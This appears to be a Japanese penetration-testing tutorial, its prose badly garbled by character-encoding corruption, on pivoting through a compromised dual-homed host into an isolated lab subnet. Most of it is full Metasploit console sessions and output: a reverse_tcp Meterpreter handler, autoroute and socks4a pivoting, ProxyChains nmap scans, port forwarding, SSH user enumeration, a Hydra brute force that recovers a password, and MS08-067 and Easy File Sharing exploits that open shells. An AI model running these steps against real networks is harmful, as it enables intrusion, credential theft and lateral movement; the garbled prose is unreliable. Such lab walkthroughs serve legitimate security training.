ãã®èšäºã§ã¯ãããããæè¡ãã¡ã¿ã¹ããã€ãã¬ãŒã ã¯ãŒã¯ãããã³ãããã·ãã§ãŒã³ã䜿çšããäŒæ¥ãããã¯ãŒã¯ã®ä¿è·ãããã»ã°ã¡ã³ãã«å¯Ÿããæ»æã·ããªãªãæ€èšããŸãã
å€å±€ãããã¯ãŒã¯ã¢ãŒããã¯ãã£ã¯ãæ å ±ã»ãã¥ãªãã£ã®åéã§éèŠãªäœçœ®ãå ããå€å±€é²åŸ¡ã®æŠå¿µã«åŸã£ãŠãéèŠãªäŒæ¥ãµãŒãã¹ãä¿è·ããããã«äœæãããŸãã èšãæããã°ãäŒæ¥ã«ãšã£ãŠéèŠãªã·ã¹ãã ã¯ãä»ã®å šå¡ãšåããããã¯ãŒã¯äžã«ååšããããšã¯ã§ããŸããã ãã®èšäºã§ã¯ããããããŸãã¯é«åºŠãªãã³ããªã³ã°ææ³ã䜿çšããäŸµå ¥ãã¹ãã®æåã®æ®µéã§ãæ»æè ããé ãããããããã¯ãŒã¯ã«çŽæ¥ã¢ã¯ã»ã¹ããã«ã¢ã¯ã»ã¹ããæ¹æ³ã説æããŸãã
ã«ãŒãã£ã³ã°
ç°ãªããããã¯ãŒã¯äžã®ããã€ã¹ãçžäºã«éä¿¡ããæ¹æ³ã決å®ããããã»ã¹ã¯ãã«ãŒãã£ã³ã°ãšåŒã°ããŸãã ã«ãŒãã£ã³ã°ã¯éåžžãã«ãŒã¿ãŒãŸãã¯ã«ãŒã¿ãŒãšåŒã°ããããã€ã¹ã§çºçããŸãã æçµçãªå®å ã«å°éãããŸã§ãã«ãŒãã£ã³ã°ããŒãã«ã䜿çšããŠãã¹ãéã§ãããã¯ãŒã¯ãã±ããããªãã€ã¬ã¯ãããŸãã äžè¬çã«ãã«ãŒãã£ã³ã°ã¯ã«ãŒã¿ãŒã ãã§ãªããè·å Žã®ã³ã³ãã¥ãŒã¿ãŒã«ã€ã³ã¹ããŒã«ãããŠããéåžžã®ãªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã§ãå®è¡ã§ããŸãã
äžã®å³ã®äŸã«ãããšã192.168.1.0 / 24ãš192.168.10.0/24ãµããããéã®ã«ãŒãã£ã³ã°ãæåãããã«ã¯ãã«ãŒã¿ãŒã®ã«ãŒãã£ã³ã°ããŒãã«ã«é©åãªãšã³ããªãå¿ èŠã§ãã ãã®ãšã³ããªã¯ããããã¯ãŒã¯ãã±ããã192.168.1.0/24ãããã¯ãŒã¯ãã192.168.10.0/24ãããã¯ãŒã¯ã«ããŸããã®éã«ã©ã®ããã«éä¿¡ããããã瀺ããŸãã
ãããã¯ãŒã¯ãã±ããã®ãã¹ã¯ã次ã®ããã«è¡šãããšãã§ããŸãïŒãã¹ã¯ããã±ãããéä¿¡ãããã¹ãããå§ãŸããŸãïŒã
1.å®å IPã¢ãã¬ã¹ããµããããäžã«é 眮ã§ããŸããïŒ
-ãã®å Žåãè·ç©ãå®å äœæã«é éããŸãã
-ããã§ãªãå Žåã¯ããã±ãããã²ãŒããŠã§ã€ã«éä¿¡ããŸãã
2.ã«ãŒã¿ãŒã¯ãã±ãããåä¿¡ãããšãã«ãŒãã£ã³ã°ããŒãã«ã確èªããŸãã
3. IPãã±ããã®å®å ãšãªããã¹ããŸãã¯ãµããããã®ã¬ã³ãŒãã¯ãããŸããïŒ
-ãã®å Žåããã±ãããå®å ãããã¯ãŒã¯ã«éä¿¡ããŸãã
-ããã§ãªãå Žåã¯ã次ã®ã²ãŒããŠã§ã€ã«ãã±ãããéä¿¡ããŸãã
4.åãããã»ã¹ãä»ã®ãã¹ãŠã®ã«ãŒã¿ãŒã§ç¹°ãè¿ãããŸãã
5.ãã®çµæããã±ããã¯ã«ãŒã¿ãŒã«å ¥ããã«ãŒã¿ãŒã¯äŒæ¥ãããã¯ãŒã¯ããã€ã³ã¿ãŒããããžã®ã¢ã¯ã»ã¹ãæ åœãããã±ããã¯ã€ã³ã¿ãŒãããã«éä¿¡ãããŸãã
æå
ãããããšã¯ãéåžžã®ç¶æ³ã§ã¯ã¢ã¯ã»ã¹ã§ããªããããã¯ãŒã¯ãžã®ã¢ã¯ã»ã¹ãæŽçããææ³ã§ããã䟵害ãããã³ã³ãã¥ãŒã¿ãŒã䜿çšããŠååŸããŸãã ãã¹ãŠã®éé¢ããããµããããã«ã¢ã¯ã»ã¹ã§ãããããã¯ãŒã¯ããŒãã䟵害ãããšããããã¯ãŒã¯ã®éé¢ã¯åœ¹ã«ç«ã¡ãŸããã ãããã£ãŠãæ»æè ã¯äŸµå®³ããããã·ã³ã®ã«ãŒãã£ã³ã°æ©èœã䜿çšããŠãå éšã®äŒæ¥ãªãœãŒã¹ã«ã¢ã¯ã»ã¹ã§ããŸãã å éšãããã¯ãŒã¯ã«å¯ŸããŠè¡ãããåèŠæ±ã¯ãéåžžãããããšåŒã°ãã䟵害ããããã¹ããçµç±ããŸãã ã€ãŸãããã±ããçšã®å éšãããã¯ãŒã¯ãžã®ãã³ãã«ãååŸããŸãã
äžã®å³ã§ãããããã«ãäžå€®ã®ããã€ã¹ã«ã¯ãäž¡æ¹ã®ãããã¯ãŒã¯ã«ã¢ã¯ã»ã¹ããããã®2ã€ã®ãããã¯ãŒã¯ã€ã³ã¿ãŒãã§ã€ã¹ã192.168.1.0 / 24ãš192.168.10.0/24ããããŸãã ããã2ã€ã®ãããã¯ãŒã¯éã®éåžžã®æäœäžãã«ãŒãã¯ããããã¯ãŒã¯ã€ã³ã¿ãŒãã§ã€ã¹192.168.1.1ããã³192.168.10.1ãåããã«ãŒã¿ãŒãä»ããŠã®ã¿å®è¡ãããŸãã ã¢ãŒããã¯ãã£ã«ããã°ãåè·¯ã®äžå¿ã«ããããã€ã¹ã®èš±å¯ãŠãŒã¶ãŒã¯ãDMZã®äžéšã®ãµãŒãã¹ã«ã¢ã¯ã»ã¹ã§ããå¿ èŠããããŸãã
æåã®è»¢éããŒãïŒããããïŒãšããŒã転éã®äŸµå®³
æ»æã·ããªãªã«ãããšãDMZã«ããRDãã·ã³ã§metterpreterã®ã·ã§ã«ãåãåããŸããããã®ã·ã§ã«ã¯ã2ã€ã®ãããã¯ãŒã¯ã€ã³ã¿ãŒãã§ã€ã¹ãæã£ãŠããŸãã
ã芧ã®ãšãããå³ã®ã«ãŒã¿ãŒã«ã¯ãæ»æè ã«å¿ èŠãªãããã¯ãŒã¯éã®ã«ãŒãããããŸããã
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 172.16.0.20 LHOST => 172.16.0.20 msf exploit(handler) > set LPORT 1234 LPORT => 1234 msf exploit(handler) > run [*] Started reverse TCP handler on 172.16.0.20:1234 [*] Starting the payload handler... [*] Sending stage (957487 bytes) to 172.16.0.11 [*] Meterpreter session 2 opened (172.16.0.20:1234 -> 172.16.0.11:49162) meterpreter > ifconfig Interface 1 ============ Name : Software Loopback Interface 1 Hardware MAC : 00:00:00:00:00:00 MTU : 4294967295 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 11 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter Hardware MAC : 08:00:27:e1:3f:af MTU : 1500 IPv4 Address : 172.16.0.11 IPv4 Netmask : 255.255.255.0 Interface 19 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter #2 Hardware MAC : 08:00:27:7f:3c:fe MTU : 1500 IPv4 Address : 7.7.7.11 IPv4 Netmask : 255.255.255.0
ããã«ãã·ããªãªã«ãããšãæ»æè ã¯ã€ã³ã¿ãŒãã§ã€ã¹7.7.7.0/24ã®èåŸã®ãµããããã«ã¢ã¯ã»ã¹ããããšèããŠããŸãã ãããè¡ãã«ã¯ãRDãã¹ãã®ã«ãŒãã£ã³ã°ã«ãŒã«ãèšå®ããå¿ èŠããããŸãã 䟵害ããããã¹ããããããã«å€ããŸãã
ãã€ããŒãã䜿çšããŠãã€ããŒããå®è¡ããã®ã¯éåžžã«ç°¡åã§ãã 次ã®ã³ãã³ãã䜿çšããŠãæ¢åã®meterpreterã»ãã·ã§ã³ãä»ããŠãã³ãã«ãäœæã§ããŸãã
meterpreter > run autoroute -s 7.7.7.0/24 [*] Adding a route to 7.7.7.0/255.255.255.0... [+] Added route to 7.7.7.0/255.255.255.0 via 172.16.0.11 [*] Use the -p option to list all active routes meterpreter > run autoroute -p Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 7.7.7.0 255.255.255.0 Session 2 meterpreter >
æå®ãããã«ãŒã«ã«åŸã£ãŠãID 2ã®Meterpreterã»ãã·ã§ã³ã®å®è¡äžãä»ã®Metasploit Frameworkã¢ãžã¥ãŒã«ã¯7.7.7.0/24ãããã¯ãŒã¯ã«ã¢ã¯ã»ã¹ã§ããŸãã ã€ãŸããäžèšã®ã³ãã³ããå®è¡ããåŸãarp_scannerãªã©ã®ã¢ãžã¥ãŒã«ã䜿çšãããšãJCãã¹ãã®IPã¢ãã¬ã¹ã決å®ãããŸãã JCã¯å éšãããã¯ãŒã¯ã§åäœãããã¹ãã§ãããIPã¢ãã¬ã¹ã¯7.7.7.20ã§ãã
meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 [*] Running module against DISCORDIA [*] ARP Scanning 7.7.7.0/24 [*] IP: 7.7.7.11 MAC 08:00:27:7f:3c:fe (CADMUS COMPUTER SYSTEMS) [*] IP 7.7.7.12 MAC 08:00:27:3a:b2:c1 (CADMUS CIMPUTER SYSTEMS) [*] IP: 7.7.7.20 MAC 08:00:27:fa:a0:c5 (CADMUS COMPUTER SYSTEMS) [*] IP: 7.7.7.255 MAC 08:00:27:3f:2a:b5 (CADMUS COMPUTER SYSTEMS) meterpreter >
7.7.7.0/24ãããã¯ãŒã¯ã§å©çšå¯èœãªãã¹ãã®IPã¢ãã¬ã¹ãåŠç¿ããŸããã
ãã³ãã«ãä»ããŠãã©ã¯ãŒãnmap
nmapã転éããã«ã¯ãã«ãŒããmetasploitã§æ§æããsocks4ãããã·ãä»ããŠæ§æèªäœã«ã¢ã¯ã»ã¹ã§ããå¿ èŠããããŸãã ãããè¡ãã«ã¯ãmetasploitã§socks4aã¢ãžã¥ãŒã«ã䜿çšããŸãã
meterpreter > background [*] Backgrounding session 2... msf > use auxiliary/server/socks4a msf auxiliary(socks4a) > show options Module options (auxiliary/server/socks4a): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The address to listen on SRVPORT 1080 yes The port to listen on. Auxiliary action: Name Description ---- ----------- Proxy msf auxiliary(socks4a) > set srvhost 172.16.0.20 srvhost => 172.16.0.20 msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) > netstat -antp | grep 1080 [*] exec: netstat -antp | grep 1080 tcp 0 172.16.0.20:1080 0.0.0.0:* LISTEN 3626/ruby msf auxiliary(socks4a) >
çŸåšãProxyChainsãŠãŒãã£ãªãã£ã䜿çšããŠãä»»æã®TCPæ¥ç¶ãTORãSOCKS4ãSOCKS5ãHTTP / HTTPSãããã·çµç±ã§å®å ã«éä¿¡ã§ããŸãã è€æ°ã®ãããã·ãé£éã§ããŸãã å¿åæ§ã«å ããŠããã®ãããªã¹ããŒã ã䜿çšãããšãã¢ããªã±ãŒã·ã§ã³ã¯æ€åºãããå éšãããã¯ãŒã¯ã«ã¢ã¯ã»ã¹ã§ããŸãã
ProxyChainsã䜿çšããåã«ã/ etc / proxychains.confãã¡ã€ã«ã§å°ãæ§æããå¿ èŠããããŸãã ãããè¡ãã«ã¯ããã¡ã€ã«ã®æåŸã®è¡ãç·šéããŸãã
[ProxyList] # add proxy here ... # meanwile # defaults set to "tor" #socks4 127.0.0.1 9050 socks4 172.16.0.20 1080
ããã§ãäœæããsocks4ãããã·ãµãŒããŒãä»ããŠnmapãŠãŒãã£ãªãã£ãã¹ãã£ã³ã§ããŸãã
root@kali:~# proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 7.7.7.20 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.25BETA1 ( https://nmap.org ) |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:80-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:139-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:135-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:445-<><>-OK Nmap scan report for 7.7.7.20 Host is up (0.17s latency). PORT STATE SERVICE VERSION 22/tcp open ssh Bitvise WinSSHD 7.16 (FlowSsh 7.15; protocol 2.0) 80/tcp closed http Easy File Sharing Web Server httpd 6.9 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003 Host script results: | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.51 seconds root@kali:~#
ã¹ãã£ã³çµæã«åºã¥ããŠã7.7.7.20ãã¹ãäžã®SSHããã³HTTPãµãŒãã¹ã«ã¢ã¯ã»ã¹ã§ãããšèšããŸãã å ã«é²ãåã«ããããããããŒããã©ã¯ãŒãã£ã³ã°ããŸãã¯ããŒããã©ã¯ãŒãã£ã³ã°ã§ãã䜿çšãããå¥ã®ææ³ãèŠãŠãããŸãã
ããŒã転é
ããŒã転éã¯ããã³ããªã³ã°æã®åºæ¬çãªæé ã®1ã€ã§ãã ãã®ææ³ã¯ãæ€åºããããããã¯ãŒã¯å ã®ãµãŒãã¹ã«çŽæ¥ã¢ã¯ã»ã¹ã§ããªãå Žåã«äœ¿çšãããŸãã ããã¯ãã«ãŒãã£ã³ã°ãåæ¹åã§ããããã§ãã å éšãµãŒãã¹ã«ã¢ã¯ã»ã¹ããæ¹æ³ã¯ç¥ã£ãŠããŸããããµãŒãã¹ã«ã¯æ»æè ã®ãã·ã³ãžã®é©åãªã«ãŒãããããŸããã
ãããã£ãŠãmetterpreterã»ãã·ã§ã³ãä»ããŠãæ»æè ã®ãã·ã³ããã¿ãŒã²ãããµãŒãã¹ã®ããŒãã«ããŒãããªãã€ã¬ã¯ãããŸãã ãã®ããŒããã©ã¯ãŒãã£ã³ã°ã¯ã䟵害ããããã·ã³ã«ïŒããããã§ïŒmetterpreterããã»ã¹ãããéãæ©èœããŸãã
autorouteã䜿çšããŠäœæããããã³ãã«ã¯ãã¡ã¿ã¹ããã€ãã¬ãŒã ã¯ãŒã¯ã®ã³ã³ããã¹ãã«ã®ã¿ååšããä»ã®ã¢ãžã¥ãŒã«ã§äœ¿çšã§ããããšã«æ³šæããŠãã ããã ãã ãããã¬ãŒã ã¯ãŒã¯ãè¶ ããä»ã®ãŠãŒãã£ãªãã£ã§ãã³ãã«ã䜿çšããå Žåã¯ããããã·ãã§ãŒã³ãªã©ã®ããŒã«ãšããŒã転éãªã©ã®æè¡ãå¿ èŠã§ãã
ããŒã転éã¯ãMetasploitãã¬ãŒã ã¯ãŒã¯ã®ãã¹ãã¢ãžã¥ãŒã«ã®1ã€ã§ããportfwdã¢ãžã¥ãŒã«ã䜿çšããŠå®è¡ã§ããŸãã
meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L <opt> Forward: local host to listen on (optional). Remote: local host to connect to. -R Indicates a reverse port forward. -h Help banner. -i <opt> Index of the port forward entry to interact with (see the "list" command). -l <opt> Forward: local port to listen on. Reverse: local port to connect to. -p <opt> Forward: remote port to connect to. Reverse: remote port to listen on. -r <opt> Forward: remote host to connect to. meterpreter >
ãã©ãŠã¶ã«å¯Ÿå¿ããURLãå ¥åããŠããŒã«ã«ããŒã2323ã«æ¥ç¶ãããªã¯ãšã¹ããéä¿¡ãããšããªã¯ãšã¹ãã¯Metasploit Frameworkãä»ããŠããŒã7.7.7.20ã®ããŒã80ã«ãªãã€ã¬ã¯ããããŸãã 以åãnmapãšproxychainsã䜿çšããŠãå éšãããã¯ãŒã¯ã®TCPããŒã80ã§å®è¡ãããŠããWebãµãŒãã¹ãããããšãããããŸãããå©çšå¯èœãªãã¹ãŠã®Kali LinuxãŠãŒãã£ãªãã£ã§ã¢ã¯ã»ã¹ããã«ã¯ãããŒã«ã«ããŒã2323ããªã¢ãŒãããŒã80ãããŒã7.7ã«è»¢éããå¿ èŠããããŸãã 7.20ã
meterpreter > portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20 [*] Local TCP relay created: 172.16.0.20:2323 <-> 7.7.7.20:80 meterpreter > portfwd list meterpreter > portfwd list Active Port Forwards ==================== Index Local Remote Direction ----- ----- ------ --------- 1 172.16.0.20:2323 7.7.7.20:80 Forward 1 total active port forwards. meterpreter >
次ã«ãEashãã¡ã€ã«å ±æWebãµãŒããŒWebãµãŒãã¹ã«ã¢ã¯ã»ã¹ããŠã¿ãŸãããã
ããããã«ããSSHãã«ãŒããã©ãŒã¹
èŠããŠããããã«ããã·ã³7.7.7.20ã§ãSSHãµãŒãã¹ãèŠã€ãããŸããã ãã³ãã«ãä»ããŠè³æ Œæ å ±ã®æ€çŽ¢ïŒãã«ãŒããã©ãŒã¹ïŒãå®è¡ã§ããŸãã ãã®ããã«ãè£å©ã¢ãžã¥ãŒã«SSH_enumusersã䜿çšããŸãã
msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(ssh_enumusers) > set rhosts 7.7.7.20 rhosts => 7.7.7.20 msf auxiliary(ssh_enumusers) > set rport 22 rport => 22 msf auxiliary(ssh_enumusers) > set user_file /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt user_file => /usr/share/wordlists/metasploit/default_users_for_services_unhash.txt msf auxiliary(ssh_enumusers) > run [*] 7.7.7.20:22 - SSH - Checking for false positives [*] 7.7.7.20:22 - SSH - Starting scan [+] 7.7.7.20:22 - SSH - User 'admin' found [-] 7.7.7.20:22 - SSH - User 'root' not found [-] 7.7.7.20:22 - SSH - User 'Administrator' not found [+] 7.7.7.20:22 - SSH - User 'sysadm' found [-] 7.7.7.20:22 - SSH - User 'tech' not found [-] 7.7.7.20:22 - SSH - User 'operator' not found [+] 7.7.7.20:22 - SSH - User 'guest' found [-] 7.7.7.20:22 - SSH - User 'security' not found [-] 7.7.7.20:22 - SSH - User 'debug' not found [+] 7.7.7.20:22 - SSH - User 'manager' found [-] 7.7.7.20:22 - SSH - User 'service' not found [-] 7.7.7.20:22 - SSH - User '!root' not found [+] 7.7.7.20:22 - SSH - User 'user' found [-] 7.7.7.20:22 - SSH - User 'netman' not found [+] 7.7.7.20:22 - SSH - User 'super' found [-] 7.7.7.20:22 - SSH - User 'diag' not found [+] 7.7.7.20:22 - SSH - User 'Cisco' found [-] 7.7.7.20:22 - SSH - User 'Manager' not found [+] 7.7.7.20:22 - SSH - User 'DTA' found [-] 7.7.7.20:22 - SSH - User 'apc' not found [+] 7.7.7.20:22 - SSH - User 'User' found [-] 7.7.7.20:22 - SSH - User 'Admin' not found [+] 7.7.7.20:22 - SSH - User 'cablecom' found [-] 7.7.7.20:22 - SSH - User 'adm' not found [+] 7.7.7.20:22 - SSH - User 'wradmin' found [-] 7.7.7.20:22 - SSH - User 'netscreen' not found [+] 7.7.7.20:22 - SSH - User 'sa' found [-] 7.7.7.20:22 - SSH - User 'setup' not found [+] 7.7.7.20:22 - SSH - User 'cmaker' found [-] 7.7.7.20:22 - SSH - User 'enable' not found [+] 7.7.7.20:22 - SSH - User 'MICRO' found [-] 7.7.7.20:22 - SSH - User 'login' not found [*] Caught interrupt from the console... [*] Auxiliary module execution completed ^C
ã³ãã³ãã®çµæãå€ãã®ãŠãŒã¶ãŒãèŠã€ãããŸããã
Metasploit Frameworkã®ãµããŒãã¢ãžã¥ãŒã«ã«å ããŠãHydraãªã©ã®ããŒã«ã䜿çšããŠæ»æããããšãã§ããŸãã ProxyChainsãä»ããŠHydraãšãã«ãŒããã©ãŒã¹ãéå§ããŸãã ãã¹ãŠã®ãã©ãã£ãã¯ã¯ã䟵害ãããRDããŒãã§å®è¡ãããŠãããã³ãã«ãééããŸãã
root@kali:~# proxychains hydra 7.7.7.20 ssh -s 22 -L /tmp/user.txt -P top100.txt -t 4 ProxyChains-3.1 (http://proxychains.sf.net) Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... [DATA] max 4 tasks per 1 server, overall 64 tasks, 20 login tries (l:2/p:10), ~0 tries per task [DATA] attacking service ssh on port 22 |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK <><>-OK <><>-OK <><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK [22][ssh] host: 7.7.7.20 login: admin password: 123456 |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-|S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK <><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK |S-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished root@kali:~#
次ã«ãHydraã䜿çšããŠååŸãããŠãŒã¶ãŒåadminãšãã¹ã¯ãŒã123456ã䜿çšããŠããããã·ãµãŒããŒçµç±ã§SSHçµç±ã§æ¥ç¶ã§ããŸãã
root@kali:~# proxychains ssh admin@7.7.7.20 ProxyChains-3.1 (http://proxychains.sf.net) |D-chain|-<>-172.16.0.20:1080-<><>-7.7.7.20:22-<><>-OK The authenticity of host '7.7.7.20 (7.7.7.20)' can't be established. ECDSA key fingerprint is SHA256:Rcz2KrPF3BTo16Ng1kET91ycbr9c8vOkZcZ6b4VawMQ. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '7.7.7.20' (ECDSA) to the list of known hosts. admin@7.7.7.20's password: bvshell:/C/Documents and Settings/All Users$ pwd /C/Documents and Settings/All Users bvshell:/C/Documents and Settings/All Users$ dir 2016-12-24 21:32 <DIR> Application Data 2016-12-25 06:16 <DIR> Desktop 2016-12-24 18:36 <DIR> Documents 2016-12-24 18:37 <DIR> DRM 2016-12-24 21:32 <DIR> Favorites 2016-12-24 18:38 <DIR> Start Menu 2016-12-24 21:32 <DIR> Templates 0 Files 0 bytes 7 Directories bvshell:/C/Documents and Settings/All Users$
2çªç®ã®ããããããŒããžã®ã¢ã¯ã»ã¹
ãããã¯ãŒã¯7.7.7.0/24ã®nmapã¹ãã£ã³äžã«ãEasy File Shareã¢ããªã±ãŒã·ã§ã³ã®MS08-067ããã³BoFã®è匱æ§ã«å¯ŸããŠè匱ãªãã¹ããèŠã€ãããŸããã 2çªç®ã®ããããããŒããžã®ã¢ã¯ã»ã¹ã¯ãè匱æ§ã®1ã€ã䜿çšããŠååŸã§ããŸãã ãã1ã€ã®ãªãã·ã§ã³ã¯ãSSHããŒããã©ã¯ãŒãã£ã³ã°ãã¯ããã¯ã䜿çšããŠãã³ããªã³ã°ãç¶ç¶ããããšã§ãããããã§ã¯MS08-067ãšBoFã䜿çšããŸãã
è匱æ§MS08-067ããã³Bind TCP
Metasploit Frameworkã«ã¯ããšã¯ã¹ããã€ã/ windows / smb / ms08_067_netapiã®è匱æ§ãå©çšããããã®ã¢ãžã¥ãŒã«ããããŸãã
bind_tcpãã€ããŒãã䜿çšããŠããããšã«æ³šæããããšãéèŠã§ãã åæ¹åã®ã«ãŒããå®çŸ©ãããŠããªããããã¿ãŒã²ããã·ã¹ãã ã¯æ»æè ã®ãã·ã³ã«åæ¥ç¶ã§ããŸããã é©åãªã«ãŒãããããŸããã ãããã£ãŠãã¿ãŒã²ãããã·ã³ã¯ãããŒããžã®æ¥ç¶ãåŸ ã€ã ãã§ããããã¯ãbind_tcpãã€ããŒãèšå®ã§æå®ããŸãã 次ã®å³ã¯ãçŽæ¥æ¥ç¶ãšéæ¥ç¶ã䜿çšããå Žåã®äžé£ã®æé ã瀺ããŠããŸãã
MS08-067ãåäœãããã¢ãžã¥ãŒã«bind_tcpãéžæãã2çªç®ã®ãã·ã³ã䟵害ããŸãã
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set rhost 7.7.7.20 rhost => 7.7.7.20 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 7.7.7.20 yes The target address RPORT 445 yes The SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LPORT 4444 yes The listen port RHOST 7.7.7.20 no The target address Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > run [*] Started bind handler [*] 7.7.7.20:445 - Automatically detecting the target... [*] 7.7.7.20:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown [*] 7.7.7.20:445 - We could not detect the language pack, defaulting to English [*] 7.7.7.20:445 - Selected Target: Windows 2003 SP2 English (NX) [*] 7.7.7.20:445 - Attempting to trigger the vulnerability... [*] Sending stage (957999 bytes) to 7.7.7.20 [*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444) meterpreter >
è匱æ§ç°¡åãã¡ã€ã«å ±æBoF
Easy File Shareã¢ããªã±ãŒã·ã§ã³ã«ããå¥ã®è匱æ§ãå©çšããããšãã§ããŸãã ãã·ã³ã¯æ¬¡ã®ããã«äŸµå®³ãããå¯èœæ§ããããŸãã
msf > use exploit/windows/http/easyfilesharing_seh msf exploit(easyfilesharing_seh) > show options Module options (exploit/windows/http/easyfilesharing_seh): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 80 yes The target port Exploit target: Id Name -- ---- 0 Easy File Sharing 7.2 HTTP msf exploit(easyfilesharing_seh) > set rhost 7.7.7.20 rhost => 7.7.7.20 msf exploit(easyfilesharing_seh) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(easyfilesharing_seh) > run [*] Started bind handler [*] 7.7.7.20:80 - 7.7.7.20:80 - Sending exploit... [+] 7.7.7.20:80 - Exploit Sent [*] Sending stage (957999 bytes) to 7.7.7.20 [*] Meterpreter session 2 opened (172.16.0.20-172.16.0.11:0 -> 7.7.7.20:4444) at 2016-12-26 14:21:11 +0300 meterpreter > ipconfig Interface 1 ============ Name : MS TCP Loopback interface Hardware MAC : 00:00:00:00:00:00 MTU : 1520 IPv4 Address : 127.0.0.1 Interface 65539 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter Hardware MAC : 08:00:27:29:cd:cb MTU : 1500 IPv4 Address : 8.8.8.3 IPv4 Netmask : 255.255.255.0 Interface 65540 ============ Name : Intel(R) PRO/1000 MT Desktop Adapter #2 Hardware MAC : 08:00:27:e3:47:43 MTU : 1500 IPv4 Address : 7.7.7.20 IPv4 Netmask : 255.255.255.0 meterpreter >
æ»æã®æŠèŠã以äžã«ç€ºããŸãã
